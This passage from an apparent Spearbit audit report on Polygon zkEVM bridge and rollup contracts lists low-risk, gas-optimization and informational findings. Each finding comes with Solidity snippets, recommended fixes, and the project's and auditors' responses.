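    // Hypothetical bounds; the concrete values are placeholders.
    uint256 internal constant _MIN_BATCH_FEE = 1 gwei;
    uint256 internal constant _MAX_BATCH_FEE = 1000 ether;

    // Clamp a newly computed fee into [_MIN_BATCH_FEE, _MAX_BATCH_FEE] so it
    // can neither vanish (risking the division by 0 noted in 5.2.10) nor grow
    // without bound (risking overflow or an unpayable fee).
    function _clampBatchFee(uint256 newBatchFee) internal pure returns (uint256) {
        if (newBatchFee < _MIN_BATCH_FEE) return _MIN_BATCH_FEE;
        if (newBatchFee > _MAX_BATCH_FEE) return _MAX_BATCH_FEE;
        return newBatchFee;
    }
}

Calling such a helper at the end of _updateBatchFee() (i.e. batchFee = _clampBatchFee(batchFee);) would enforce the limits after every update.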
Polygon-Hermez: Solved in PR 90.
Spearbit: Verified.
+5.2.12 Bridge deployment will fail if initialize() is front-run
Severity: Low Risk
Context: deployContracts.js
Description: By default, Hardhat will deploy transparent upgradeable proxies when calling upgrades.deployProxy() with no type specified. This function accepts data which is used to initialize the state of the contract being deployed. However, because the zkEVM bridge script utilizes the output of each contract address on deployment, it is not trivial to atomically deploy and initialize contracts. As a result, there is a small time window available for attackers to front-run calls to initialize the necessary bridge contracts, allowing them to temporarily DoS the deployment process.
Recommendation: Consider pre-calculating all contract addresses prior to proxy deployment so each contract can be initialized atomically.
Polygon-Hermez: We are currently deciding the best way to make a deterministic deployment for the bridge, but will take this into account for sure.
Spearbit: Acknowledged.
+5.2.13 Add input validation for the setVeryBatchTimeTarget method
Severity: Low Risk
Context: PolygonZkEVM.sol#L1171-L1176
Description: The setVeryBatchTimeTarget method in PolygonZkEVM accepts a uint64 newVeryBatchTimeTarget argument to set the veryBatchTimeTarget. This variable is set to 30 minutes in the initialize method, so it is expected that it shouldn't hold a very big value, as it is compared against a timestamp difference in _updateBatchFee. Since there is no upper bound for the value of the newVeryBatchTimeTarget argument, it is possible (for example due to fat-fingering the call) that an admin passes a big value (up to type(uint64).max), which will result in wrong calculations in _updateBatchFee.
Recommendation: Add a sensible upper bound for the value of newVeryBatchTimeTarget, for example 1 day.
Polygon-Hermez: Solved in PR 88.
Spearbit: Verified.
+5.2.14 Single-step process for critical ownership transfer
Severity: Low Risk
Context: PolygonZkEVM.sol#L1182, OwnableUpgradeable.sol#L74
Description: If the nominated newAdmin or newOwner account is not a valid account, the owner or admin risks locking themselves out.

function setAdmin(address newAdmin) public onlyAdmin {
    admin = newAdmin;
    emit SetAdmin(newAdmin);
}

function transferOwnership(address newOwner) public virtual onlyOwner {
    require(newOwner != address(0), "Ownable: new owner is the zero address");
    _transferOwnership(newOwner);
}

Recommendation: Consider implementing a two-step process where the owner or admin nominates an account, and the nominated account calls an acceptTransfer() function for the transfer to succeed.
Polygon-Hermez: Solved for Admin in PR 87. The owner is intended to be a multisig during a bootstrap period and will be renounced afterward. We consider acceptTransfer() to be overkill for this address.
Spearbit: Verified and Acknowledged.
+5.2.15 Ensure no native asset value is sent in payable method that can handle ERC20 transfers as well
Severity: Low Risk
Context: PolygonZkEVMBridge.sol#L154-L187
Description: The bridgeAsset method of PolygonZkEVMBridge is marked payable, as it can work both with the native asset and with ERC20 tokens. In the codepath where it is checked that the token is not the native asset but an ERC20 token, it is not validated that the user did not actually provide value with the transaction.
The likelihood of this happening is pretty low, since it requires a user error, but if it does happen then the native asset value will be stuck in the PolygonZkEVMBridge contract.
Recommendation: Ensure that no native asset value is sent when the bridged asset is an ERC20 token by adding the following code to the codepath of the ERC20 bridging:

require(msg.value == 0, "PolygonZkEVMBridge::bridgeAsset: Expected zero native asset value when bridging ERC20 tokens");

You can also use an if statement and a custom error instead of a require statement.
Polygon-Hermez: Solved in PR 87.
Spearbit: Verified.
+5.2.16 Calls to the name, symbol and decimals functions will be unsafe for non-standard ERC20 tokens
Severity: Low Risk
Context: PolygonZkEVMBridge.sol#L181-185
Description: The bridgeAsset method of PolygonZkEVMBridge accepts an address token argument and later calls its name, symbol and decimals methods. There are two potential problems with this:
1. Those methods are not mandatory in the ERC20 standard, so there can be ERC20-compliant tokens that do not have some or all of the name, symbol or decimals methods; they will not be usable with the protocol, because the calls will revert.
2. There are tokens that use bytes32 instead of string as the value type of their name and symbol storage variables and their getter functions (an example is MKR). This can cause reverts when trying to consume metadata from those tokens.
Also, see weird-erc20 for nonstandard tokens.
Recommendation: For the first problem, a simple solution is to use a low-level staticcall for those method calls and, if they are unsuccessful, to use some default values. For the second problem, it would be best to again do a low-level staticcall and then use an external library that checks whether the returned data is of type string and, if not, casts it to one. Also, see MasterChefJoeV3 as an example of a possible solution.
Polygon-Hermez: Solved in PR 90 and PR 91.
Spearbit: Verified.
5.3 Gas Optimization
+5.3.1 Use calldata instead of memory for array parameters
Severity: Gas Optimization
Context: PolygonZkEVMBridge.sol#L272-L373, PolygonZkEVMBridge.sol#L520-L581, DepositContract.sol#L90-L112
Description: The code frequently uses memory arrays for externally called functions. Some gas could be saved by making these calldata. The calldata can also be cascaded to internal functions that are called from the external functions.

function claimAsset(bytes32[] memory smtProof) public {
    ...
    _verifyLeaf(smtProof);
    ...
}

function _verifyLeaf(bytes32[] memory smtProof) internal {
    ...
    verifyMerkleProof(smtProof);
    ...
}

function verifyMerkleProof(..., bytes32[] memory smtProof, ...) internal {
    ...
}

Recommendation: Consider changing the code to:

-function claimAsset(bytes32[] memory smtProof) public {
+function claimAsset(bytes32[] calldata smtProof) public {
    ...
    _verifyLeaf(smtProof);
    ...
}

-function _verifyLeaf(bytes32[] memory smtProof) internal {
+function _verifyLeaf(bytes32[] calldata smtProof) internal {
    ...
    verifyMerkleProof(smtProof);
    ...
}

-function verifyMerkleProof(..., bytes32[] memory smtProof, ...) internal {
+function verifyMerkleProof(..., bytes32[] calldata smtProof, ...) internal {
    ...
}

Polygon-Hermez: Solved in PR 85.
Spearbit: Verified.
+5.3.2 Optimize networkID == MAINNET_NETWORK_ID
Severity: Gas Optimization
Context: PolygonZkEVMBridge.sol#L520-L581, PolygonZkEVMBridge.sol#L69-L77
Description: The value for networkID is defined in initialize() and MAINNET_NETWORK_ID is constant.
So networkID == MAINNET_NETWORK_ID can be calculated in initialize() and stored to save some gas. It is even cheaper if networkID is immutable, which would require adding a constructor.

uint32 public constant MAINNET_NETWORK_ID = 0;
uint32 public networkID;

function initialize(uint32 _networkID, ...) public virtual initializer {
    networkID = _networkID;
    ...
}

function _verifyLeaf(...) ... {
    ...
    if (networkID == MAINNET_NETWORK_ID) {
        ...
    } else {
        ...
    }
}

Recommendation: Consider calculating networkID == MAINNET_NETWORK_ID in initialize() or, preferably, a constructor.
Polygon-Hermez: We decided to go for a deterministic deployment for the PolygonZkEVMBridge contract; therefore we prefer not to use immutables in this contract. When implemented without immutable, the resulting code is less optimal.
Spearbit: Acknowledged.
+5.3.3 Optimize updateExitRoot()
Severity: Gas Optimization
Context: PolygonZkEVMGlobalExitRoot.sol#L54-L75
Description: The function updateExitRoot() accesses the global variables lastMainnetExitRoot and lastRollupExitRoot multiple times. This can be optimized using temporary variables.

function updateExitRoot(bytes32 newRoot) external {
    ...
    if (msg.sender == rollupAddress) {
        lastRollupExitRoot = newRoot;
    }
    if (msg.sender == bridgeAddress) {
        lastMainnetExitRoot = newRoot;
    }
    bytes32 newGlobalExitRoot = keccak256(
        abi.encodePacked(lastMainnetExitRoot, lastRollupExitRoot)
    );
    if ( ... ) {
        ...
        emit UpdateGlobalExitRoot(lastMainnetExitRoot, lastRollupExitRoot);
    }
}

Recommendation: Consider changing the code to something like:

function updateExitRoot(bytes32 newRoot) external {
    ...
    bytes32 cm = lastMainnetExitRoot;
    bytes32 cr = lastRollupExitRoot;
    if (msg.sender == rollupAddress) {
        lastRollupExitRoot = cr = newRoot;
    }
    if (msg.sender == bridgeAddress) {
        lastMainnetExitRoot = cm = newRoot;
    }
    bytes32 newGlobalExitRoot = keccak256(
        abi.encodePacked(cm, cr)
    );
    if ( ... ) {
        ...
        emit UpdateGlobalExitRoot(cm, cr);
    }
}

Polygon-Hermez: Solved in PR 82.
Spearbit: Verified.
+5.3.4 Optimize _setClaimed()
Severity: Gas Optimization
Context: PolygonZkEVMBridge.sol#L272-L436, PolygonZkEVMBridge.sol#L520-L581, PolygonZkEVMBridge.sol#L587-L605
Description: The functions claimAsset() and claimMessage() first verify !isClaimed() (via the function _verifyLeaf()) and then call _setClaimed(). These two functions can be combined into a more efficient version.

function claimAsset(...) ... {
    _verifyLeaf(...);
    _setClaimed(index);
    ...
}

function claimMessage(...) ... {
    _verifyLeaf(...);
    _setClaimed(index);
    ...
}

function _verifyLeaf(...) ... {
    require( !isClaimed(index), ...);
    ...
}

function isClaimed(uint256 index) public view returns (bool) {
    uint256 claimedWordIndex = index / 256;
    uint256 claimedBitIndex = index % 256;
    uint256 claimedWord = claimedBitMap[claimedWordIndex];
    uint256 mask = (1 << claimedBitIndex);
    return (claimedWord & mask) == mask;
}

function _setClaimed(uint256 index) private {
    uint256 claimedWordIndex = index / 256;
    uint256 claimedBitIndex = index % 256;
    claimedBitMap[claimedWordIndex] = claimedBitMap[claimedWordIndex] | (1 << claimedBitIndex);
}

Recommendation: The following suggestion is based on the Uniswap permit2 bitmap: replace the duo of isClaimed() and _setClaimed() with the following function _setAndCheckClaimed(). This could be called either inside or outside of _verifyLeaf().
function _setAndCheckClaimed(uint256 index) private {
    (uint256 wordPos, uint256 bitPos) = _bitmapPositions(index);
    uint256 mask = 1 << bitPos;
    uint256 flipped = claimedBitMap[wordPos] ^= mask;
    require(flipped & mask != 0, "PolygonZkEVMBridge::_verifyLeaf: Already claimed");
}

function _bitmapPositions(uint256 index) private pure returns (uint256 wordPos, uint256 bitPos) {
    wordPos = uint248(index >> 8);
    bitPos = uint8(index);
}

Note: update the error message depending on whether it will be called inside or outside of _verifyLeaf(). If the status of the bits has to be retrieved from the outside, add the following function:

function isClaimed(uint256 index) external view returns (bool) {
    (uint256 wordPos, uint256 bitPos) = _bitmapPositions(index);
    uint256 mask = (1 << bitPos);
    return (claimedBitMap[wordPos] & mask) == mask;
}

Polygon-Hermez: Solved in PR 82.
Spearbit: Verified.
+5.3.5 SMT branch comparisons can be optimised
Severity: Gas Optimization
Context: DepositContract.sol#L99-L109, DepositContract.sol#L65-L77, DepositContract.sol#L30-L46
Description: When verifying a merkle proof, the search does not terminate until we have iterated through the tree depth to calculate the merkle root. The path is represented by the lower 32 bits of the index variable, where each bit represents the direction of the path taken. Two changes can be made to the following snippet of code:
• Bit shift currentIndex to the right instead of dividing by 2.
• Avoid overwriting the currentIndex variable and perform the bitwise comparison in-line.

function verifyMerkleProof(
    ...
    uint256 currrentIndex = index;
    for (
        uint256 height = 0;
        height < _DEPOSIT_CONTRACT_TREE_DEPTH;
        height++
    ) {
        if ((currrentIndex & 1) == 1)
            node = keccak256(abi.encodePacked(smtProof[height], node));
        else
            node = keccak256(abi.encodePacked(node, smtProof[height]));
        currrentIndex /= 2;
    }

Recommendation: Consider changing the code to:

function verifyMerkleProof(
    ...
-   uint256 currrentIndex = index;
    for (
        uint256 height = 0;
        height < _DEPOSIT_CONTRACT_TREE_DEPTH;
        height++
    ) {
-       if ((currrentIndex & 1) == 1)
+       if (((index >> height) & 1) == 1)
            node = keccak256(abi.encodePacked(smtProof[height], node));
        else
            node = keccak256(abi.encodePacked(node, smtProof[height]));
-       currrentIndex /= 2;
    }

This same optimization can also be applied to similar instances found in _deposit() and getDepositRoot().
Polygon-Hermez: Solved in PR 88.
Spearbit: Verified.
+5.3.6 Increments can be optimised by pre-fixing variable with ++
Severity: Gas Optimization
Context: DepositContract.sol#L64
Description: There are small gas savings when pre-fixing increments with ++. Sometimes this can be used to combine multiple statements, as in function _deposit().

function _deposit(bytes32 leafHash) internal {
    ...
    depositCount += 1;
    uint256 size = depositCount;
    ...
    }

Other occurrences of ++:

    PolygonZkEVM.sol:        for (uint256 i = 0; i < batchesNum; i++) {
    PolygonZkEVM.sol:        currentLastForceBatchSequenced++;
    PolygonZkEVM.sol:        currentBatchSequenced++;
    PolygonZkEVM.sol:        lastPendingState++;
    PolygonZkEVM.sol:        lastForceBatch++;
    PolygonZkEVM.sol:        for (uint256 i = 0; i < batchesNum; i++) {
    PolygonZkEVM.sol:        currentLastForceBatchSequenced++;
    PolygonZkEVM.sol:        currentBatchSequenced++;
    lib/DepositContract.sol: height++
    lib/DepositContract.sol: for (uint256 height = 0; height < _DEPOSIT_CONTRACT_TREE_DEPTH; height++) {
    lib/DepositContract.sol: for (uint256 height = 0; height < _DEPOSIT_CONTRACT_TREE_DEPTH; height++) {
    lib/TokenWrapped.sol:    nonces[owner]++,
    verifiers/Verifier.sol:  for (uint i = 0; i < elements; i++) {
    verifiers/Verifier.sol:  for (uint i = 0; i < input.length; i++) {
    verifiers/Verifier.sol:  for (uint i = 0; i < input.length; i++) {

Recommendation: Consider pre-fixing all variables where ++ is used. Combine statements where possible, provided it doesn't reduce readability.

    function _deposit(bytes32 leafHash) internal {
        ...
        uint256 size = ++depositCount;
        ...
    }

Polygon-Hermez: Partially solved in PR 82, with some exceptions where it would make the code less readable or wouldn't save gas.

Spearbit: Verified.

+5.3.7 Move initialization values from initialize() to immutable via constructor

Severity: Gas Optimization

Context: PolygonZkEVM.sol#L337-L370, PolygonZkEVMBridge.sol#L69-L77

Description: The contracts PolygonZkEVM and PolygonZkEVMBridge initialize variables via initialize(). If these variables are never updated, they could also be made immutable, which would save some gas. In order to achieve that, a constructor has to be added to set the immutable variables. This could be applicable for chainID in contract PolygonZkEVM and networkID in contract PolygonZkEVMBridge.

    contract PolygonZkEVM is ... {
        ...
        uint64 public chainID;
        ...
        function initialize(...) ... {
            ...
            chainID = initializePackedParameters.chainID;
            ...
        }

    contract PolygonZkEVMBridge is ... {
        ...
        uint32 public networkID;
        ...
        function initialize(uint32 _networkID, ...) ... {
            networkID = _networkID;
            ...
        }

Recommendation: Consider making the variables immutable and adding a constructor to initialize them (a minimal sketch of this pattern follows after 5.3.8 below).

Polygon-Hermez: Implemented for PolygonZkEVM in PR 88. Not implemented for PolygonZkEVMBridge, because it will be deployed with the same address on different chains via CREATE2. In that case it is easier if the initBytecode is the same, and thus it's easier to stay with initialize().

Spearbit: Verified and acknowledged.

+5.3.8 Optimize isForceBatchAllowed()

Severity: Gas Optimization

Context: PolygonZkEVM.sol#L393-L399

Description: The modifier isForceBatchAllowed() includes a redundant check == true. This can be optimized to save some gas.

    modifier isForceBatchAllowed() {
        require(forceBatchAllowed == true, ...);
        _;
    }

Recommendation: Consider changing the code to

    modifier isForceBatchAllowed() {
-       require(forceBatchAllowed == true, ...);
+       require(forceBatchAllowed, ...);
        _;
    }

Polygon-Hermez: We decided to remove this modifier; it was intended to be present only on testnet, when forced batches were not yet supported by the node and prover. This won't be necessary anymore. It's a requirement that even the admin won't be able to censor the system.

Spearbit: Verified.
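To make the trade-off in 5.3.7 concrete, the following is a minimal standalone sketch (hypothetical, not the project's code) of the immutable-via-constructor pattern. Immutables are inlined into the runtime bytecode at deployment, so reading them avoids an SLOAD on every access:

    // SPDX-License-Identifier: MIT
    pragma solidity ^0.8.0;

    // Hypothetical illustration of replacing an initialize()-assigned storage
    // variable with an immutable assigned in the constructor.
    contract ImmutableSketch {
        // Before: `uint64 public chainID;` assigned inside initialize().
        // After: immutable, assigned exactly once at deployment.
        uint64 public immutable chainID;

        constructor(uint64 _chainID) {
            chainID = _chainID;
        }

        function isMainnetChain() external view returns (bool) {
            // Reads an inlined constant from code instead of a storage slot.
            return chainID == 1;
        }
    }

The flip side, as Polygon-Hermez notes above, is that constructor arguments change the creation bytecode, which matters for deterministic CREATE2 deployments across chains.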
+5.3.9 Optimize loop in _updateBatchFee()

Severity: Gas Optimization

Context: PolygonZkEVM.sol#L839-L908

Description: The function _updateBatchFee() uses the following check in a loop:

    block.timestamp - currentSequencedBatchData.sequencedTimestamp > veryBatchTimeTarget

This is the same as:

    block.timestamp - veryBatchTimeTarget > currentSequencedBatchData.sequencedTimestamp

As block.timestamp - veryBatchTimeTarget is constant during the execution of this function, it can be taken outside the loop to save some gas.

    function _updateBatchFee(uint64 newLastVerifiedBatch) internal {
        ...
        while (currentBatch != currentLastVerifiedBatch) {
            ...
            if (
                block.timestamp - currentSequencedBatchData.sequencedTimestamp >
                veryBatchTimeTarget
            ) {
                ...
            }
        }
    }

Recommendation: Consider optimizing the loop by storing the value of block.timestamp - veryBatchTimeTarget in a temporary variable and using that in the comparison.

Polygon-Hermez: Solved in PR 90.

Spearbit: Verified.

+5.3.10 Optimize multiplication

Severity: Gas Optimization

Context: PolygonZkEVM.sol#L888

Description: The multiplication in function _updateBatchFee can be optimized to save some gas.

Recommendation: Consider changing the code to:

+   unchecked {
-       (10 ** (diffBatches * 3))
+       (1000 ** diffBatches)
+   }

Note: the gas saving is only obtained when using unchecked and is very minimal, so double-check it is worth the trouble.

Polygon-Hermez: Solved in PR 90.

Spearbit: Verified.

+5.3.11 Changing constant storage variables from public to private will save gas

Severity: Gas Optimization

Context: PolygonZkEVM.sol#L114-L127, PolygonZkEVMBridge.sol#L38-L44, TokenWrapped.sol#L9-L20

Description: Usually constant variables are not expected to be read on-chain, and their value can easily be seen by looking at the source code. For this reason, there is no point in using public for a constant variable, since it auto-generates a getter function which increases deployment cost and sometimes function call cost.

Recommendation: Replace the referenced public constant occurrences with private constant to save gas.

Polygon-Hermez: The public constants of TokenWrapped can be useful for both front-end implementations and other contracts, as can be seen in the permit2 implementation of Uniswap. The rest of the constants are changed in PR 85.

Spearbit: Verified.

+5.3.12 Storage variables not changeable after deployment can be immutable

Severity: Gas Optimization

Context: Mentioned in Recommendation

Description: If a storage variable is not changeable after deployment (set in the constructor), it can be turned into an immutable variable to save gas.

Recommendation:

• PolygonZkEVMGlobalExitRoot.sol#L6-L48

- import "@openzeppelin/contracts-upgradeable/proxy/utils/Initializable.sol";

- address public bridgeAddress;
- address public rollupAddress;
+ address public immutable bridgeAddress;
+ address public immutable rollupAddress;

- function initialize(address _rollupAddress, address _bridgeAddress) public initializer {
+ constructor(address _rollupAddress, address _bridgeAddress) {
      rollupAddress = _rollupAddress;
      bridgeAddress = _bridgeAddress;
  }

• PolygonZkEVMGlobalExitRootL2.sol#L27

- address public bridgeAddress;
+ address public immutable bridgeAddress;

• PolygonZkEVMTimelock.sol#L14

- PolygonZkEVM public polygonZkEVM;
+ PolygonZkEVM public immutable polygonZkEVM;

• TokenWrapped.sol#L29-L32

- address public bridgeAddress;
+ address public immutable bridgeAddress;
  ...
- uint8 private _decimals;
+ uint8 private immutable _decimals;

Polygon-Hermez: Solved in PR 88.
Spearbit: Verified.

+5.3.13 Optimize check in _consolidatePendingState()

Severity: Gas Optimization

Context: PolygonZkEVM.sol#L799-L832

Description: The check in function _consolidatePendingState() can be optimized to save some gas. As lastPendingStateConsolidated is of type uint64 and thus is at least 0, the check pendingStateNum > lastPendingStateConsolidated makes sure pendingStateNum > 0. So the explicit check for pendingStateNum != 0 isn't necessary.

    uint64 public lastPendingStateConsolidated;

    function _consolidatePendingState(uint64 pendingStateNum) internal {
        require(
            pendingStateNum != 0 &&
            pendingStateNum > lastPendingStateConsolidated &&
            pendingStateNum <= lastPendingState,
            "PolygonZkEVM::_consolidatePendingState: pendingStateNum invalid"
        );
        ...
    }

Recommendation: Consider changing the code to

    function _consolidatePendingState(uint64 pendingStateNum) internal {
        require(
-           pendingStateNum != 0 &&
            pendingStateNum > lastPendingStateConsolidated && // pendingStateNum can't be 0
            pendingStateNum <= lastPendingState,
            "PolygonZkEVM::_consolidatePendingState: pendingStateNum invalid"
        );
        ...
    }

Polygon-Hermez: Solved in PR 87.

Spearbit: Verified.

+5.3.14 Custom errors not used

Severity: Gas Optimization

Context: PolygonZkEVM.sol#L373

Description: Custom errors lead to cheaper deployment and run-time costs.

Recommendation: For cheaper gas costs, consider using custom errors throughout the whole project.

Polygon-Hermez: Solved in PR 90.

Spearbit: Verified.

+5.3.15 Variable can be updated only once instead of on each iteration of a loop

Severity: Gas Optimization

Context: PolygonZkEVM.sol#L495, PolygonZkEVM.sol#L1039

Description: In functions sequenceBatches() and sequenceForceBatches(), the currentBatchSequenced variable is increased by 1 on each iteration of the loop but is not used inside of it. This means that instead of doing batchesNum addition operations, the addition can be done only once, after the loop.

Recommendation: Delete the currentBatchSequenced++; line and just do currentBatchSequenced += batchesNum; right after the loop.

Polygon-Hermez: Solved in PR 87.

Spearbit: Verified.

+5.3.16 Optimize emits in sequenceBatches() and sequenceForceBatches()

Severity: Gas Optimization

Context: PolygonZkEVM.sol#L409-L533, PolygonZkEVM.sol#L972-L1054

Description: The emits in functions sequenceBatches() and sequenceForceBatches() could be gas-optimized by emitting the temporary variables that have just been stored in the global variables.

    function sequenceBatches(...) ... {
        ...
        lastBatchSequenced = currentBatchSequenced;
        ...
        emit SequenceBatches(lastBatchSequenced);
    }

    function sequenceForceBatches(...) ... {
        ...
        lastBatchSequenced = currentBatchSequenced;
        ...
        emit SequenceForceBatches(lastBatchSequenced);
    }

Recommendation: Consider changing the code to:

    function sequenceBatches(...) ... {
        ...
        lastBatchSequenced = currentBatchSequenced;
        ...
-       emit SequenceBatches(lastBatchSequenced);
+       emit SequenceBatches(currentBatchSequenced);
    }

    function sequenceForceBatches(...) ... {
        ...
        lastBatchSequenced = currentBatchSequenced;
        ...
-       emit SequenceForceBatches(lastBatchSequenced);
+       emit SequenceForceBatches(currentBatchSequenced);
    }

Polygon-Hermez: Solved in PR 85.

Spearbit: Verified.

+5.3.17 Only update lastForceBatchSequenced if necessary in function sequenceBatches()

Severity: Gas Optimization

Context: PolygonZkEVM.sol#L409-L533

Description: The function sequenceBatches() writes back to lastForceBatchSequenced; however, this is only necessary if there are forced batches.
This could be optimized to save some gas, and at the same time the calculation of nonForcedBatchesSequenced could also be optimized.

    function sequenceBatches(...) ... {
        ...
        uint64 currentLastForceBatchSequenced = lastForceBatchSequenced;
        ...
        if (currentBatch.minForcedTimestamp > 0) {
            currentLastForceBatchSequenced++;
            ...
        }
        uint256 nonForcedBatchesSequenced = batchesNum -
            (currentLastForceBatchSequenced - lastForceBatchSequenced);
        ...
        lastForceBatchSequenced = currentLastForceBatchSequenced;
        ...
    }

Recommendation: Consider changing the code to something like the following. Do check if the gas savings are worth the trouble.

    function sequenceBatches(...) ... {
        ...
        uint64 currentLastForceBatchSequenced = lastForceBatchSequenced;
+       uint64 orgLastForceBatchSequenced = currentLastForceBatchSequenced;
        ...
        if (currentBatch.minForcedTimestamp > 0) {
            currentLastForceBatchSequenced++;
            ...
        }
-       uint256 nonForcedBatchesSequenced = batchesNum - (currentLastForceBatchSequenced - lastForceBatchSequenced);
+       uint256 nonForcedBatchesSequenced = batchesNum - (currentLastForceBatchSequenced - orgLastForceBatchSequenced);
        ...
+       if (currentLastForceBatchSequenced != orgLastForceBatchSequenced)
            lastForceBatchSequenced = currentLastForceBatchSequenced;
        ...
    }

Polygon-Hermez: Solved in PR 85.

Spearbit: Verified.

+5.3.18 Delete forcedBatches[currentLastForceBatchSequenced] after use

Severity: Gas Optimization

Context: PolygonZkEVM.sol#L409-L533, PolygonZkEVM.sol#L972-L1054

Description: The functions sequenceBatches() and sequenceForceBatches() consume the forcedBatches[] entries, which are no longer used afterward. Deleting these values might give a gas refund and lower the L1 gas costs.

    function sequenceBatches(...) ... {
        ...
        currentLastForceBatchSequenced++;
        ...
        require(hashedForcedBatchData == ... forcedBatches[currentLastForceBatchSequenced], ...);
    }

    function sequenceForceBatches(...) ... {
        ...
        currentLastForceBatchSequenced++;
        ...
        require(hashedForcedBatchData == forcedBatches[currentLastForceBatchSequenced], ...);
        ...
    }

Recommendation: Consider deleting the values of forcedBatches[currentLastForceBatchSequenced]. Verify this indeed saves gas.

Polygon-Hermez: Solved in PR 85.

Spearbit: Verified.

+5.3.19 Calculate keccak256(currentBatch.transactions) once

Severity: Gas Optimization

Context: PolygonZkEVM.sol#L409-L533, PolygonZkEVM.sol#L972-L1054

Description: Both functions sequenceBatches() and sequenceForceBatches() calculate keccak256(currentBatch.transactions) twice. As currentBatch.transactions could be rather large, calculating its keccak256() could be relatively expensive.

    function sequenceBatches(BatchData[] memory batches) ... {
        ...
        if (currentBatch.minForcedTimestamp > 0) {
            ...
            bytes32 hashedForcedBatchData = ... keccak256(currentBatch.transactions) ...
            ...
        }
        ...
        currentAccInputHash = ... keccak256(currentBatch.transactions) ...
        ...
    }

    function sequenceForceBatches(ForcedBatchData[] memory batches) ... {
        ...
        bytes32 hashedForcedBatchData = ... keccak256(currentBatch.transactions) ...
        ...
        currentAccInputHash = ... keccak256(currentBatch.transactions) ...
        ...
    }

Recommendation: Consider storing the result of keccak256(currentBatch.transactions) in a temporary variable and reusing it later on.

Polygon-Hermez: Solved in PR 85.

Spearbit: Verified.
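To illustrate the caching recommended in 5.3.19, here is a minimal standalone sketch (hypothetical names, not the project's code) that hashes the byte array once and reuses the result. The hashing cost grows with the length of the input, while reusing the cached bytes32 is cheap:

    // SPDX-License-Identifier: MIT
    pragma solidity ^0.8.0;

    contract HashCacheSketch {
        function _process(bytes memory transactions, bytes32 accInputHash)
            internal
            pure
            returns (bytes32 hashedForcedBatchData, bytes32 newAccInputHash)
        {
            // Hash the (potentially large) transactions blob exactly once.
            bytes32 txHash = keccak256(transactions);
            // Reuse the cached hash in both derived values instead of
            // recomputing keccak256(transactions) a second time.
            hashedForcedBatchData = keccak256(abi.encodePacked(txHash));
            newAccInputHash = keccak256(abi.encodePacked(accInputHash, txHash));
        }
    }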
5.4 Informational

+5.4.1 Function definition of onMessageReceived()

Severity: Informational

Context: IBridgeMessageReceiver.sol#L9-L13, PolygonZkEVMBridge.sol#L388-L436

Description: As discovered by the project: the function definition of onMessageReceived() is view and returns a boolean. Also, it is not payable. The function is meant to receive ETH, so it should be payable. Also, it is meant to take action, so it shouldn't be view. The bool return value isn't used in PolygonZkEVMBridge, so it isn't necessary. Because the function is called via a low-level call, this doesn't pose a problem in practice. The current definition is confusing though.

    interface IBridgeMessageReceiver {
        function onMessageReceived(...) external view returns (bool);
    }

    contract PolygonZkEVMBridge is ... {
        function claimMessage( ... ) ... {
            ...
            (bool success, ) = destinationAddress.call{value: amount}(
                abi.encodeCall(
                    IBridgeMessageReceiver.onMessageReceived,
                    (originAddress, originNetwork, metadata)
                )
            );
            require(success, "PolygonZkEVMBridge::claimMessage: Message failed");
            ...
        }
    }

Recommendation: Change the function definition to the following:

- function onMessageReceived(...) external view returns (bool);
+ function onMessageReceived(...) external payable;

Polygon-Hermez: Solved in PR 89.

Spearbit: Verified.

+5.4.2 batchesNum can be explicitly casted in sequenceForceBatches()

Severity: Informational

Context: PolygonZkEVM.sol#L987-L990

Description: The sequenceForceBatches() function performs a check to ensure that the sequencer does not sequence forced batches that do not exist. The require statement compares two different types, uint256 and uint64. For consistency, the uint256 can be safely cast down to uint64, as Solidity ^0.8.0 checks for overflow/underflow.

Recommendation: Consider explicitly casting batchesNum down to uint64.

Polygon-Hermez: Solved by casting to uint256 in PR 85.

Spearbit: Verified.

+5.4.3 Metadata are not migrated on changes in l1 contract

Severity: Informational

Context: PolygonZkEVMBridge.sol#L338-L340

Description: If the metadata changes on mainnet (say, a decimals change) after the wrapped token's creation, the wrapped token's metadata will not change and will still point to the old decimals:

1. Token T1 was on mainnet with decimals 18.
2. This was bridged to rollup R1.
3. A wrapped token is created with decimals 18.
4. On mainnet, T1's decimals are changed to 6.
5. The wrapped token on R1 still uses 18 decimals.

Recommendation: This behavior needs to be documented so that users are careful when interacting with the L2 counterpart if any such scenario occurs.

Polygon-Hermez: We consider this very unusual behavior, to the point that we are not aware of any token that has changed its metadata (name/symbol/decimals). We could even consider such a token malicious, since changing any of the metadata fields can easily break multiple dapps or trick users. We will add a comment that we cannot support an update of the metadata if the original token updates its own metadata.

Spearbit: Verified.

+5.4.4 Remove unused import in PolygonZkEVMGlobalExitRootL2

Severity: Informational

Context: PolygonZkEVMGlobalExitRootL2.sol#L5-L11

Description: The contract PolygonZkEVMGlobalExitRootL2 imports SafeERC20.sol; however, this isn't used in the contract.

    import "@openzeppelin/contracts/token/ERC20/utils/SafeERC20.sol";

    contract PolygonZkEVMGlobalExitRootL2 {
    }

Recommendation: Remove the unused import in PolygonZkEVMGlobalExitRootL2.
- import "@openzeppelin/contracts/token/ERC20/utils/SafeERC20.sol";

Polygon-Hermez: Solved in PR 82.

Spearbit: Verified.

+5.4.5 Switch from public to external for all non-internally called methods

Severity: Informational

Context: DepositContract.sol#L90, DepositContract.sol#L124, PolygonZkEVMGlobalExitRootL2.sol#L40, PolygonZkEVMGlobalExitRoot.sol#L42, PolygonZkEVMBridge.sol#L69, PolygonZkEVMBridge.sol#L129, PolygonZkEVMBridge.sol#L222, PolygonZkEVMBridge.sol#L272, PolygonZkEVMBridge.sol#L388, PolygonZkEVMBridge.sol#L446, PolygonZkEVMBridge.sol#L480, PolygonZkEVM.sol#L337, PolygonZkEVM.sol#L409, PolygonZkEVM.sol#L545, PolygonZkEVM.sol#L624, PolygonZkEVM.sol#L783, PolygonZkEVM.sol#L920, PolygonZkEVM.sol#L972, PolygonZkEVM.sol#L1064, PolygonZkEVM.sol#L1074, PolygonZkEVM.sol#L1084, PolygonZkEVM.sol#L1097, PolygonZkEVM.sol#L1110, PolygonZkEVM.sol#L1133, PolygonZkEVM.sol#L1155, PolygonZkEVM.sol#L1171, PolygonZkEVM.sol#L1182, PolygonZkEVM.sol#L1204, PolygonZkEVM.sol#L1258, Verifier.sol#L320

Description: Functions that are not called from inside of the contract should be external instead of public, which prevents accidentally using a function internally that is meant to be used externally. See also the issue "Use calldata instead of memory for function parameters".

Recommendation: Change the function visibility from public to external for the linked methods.

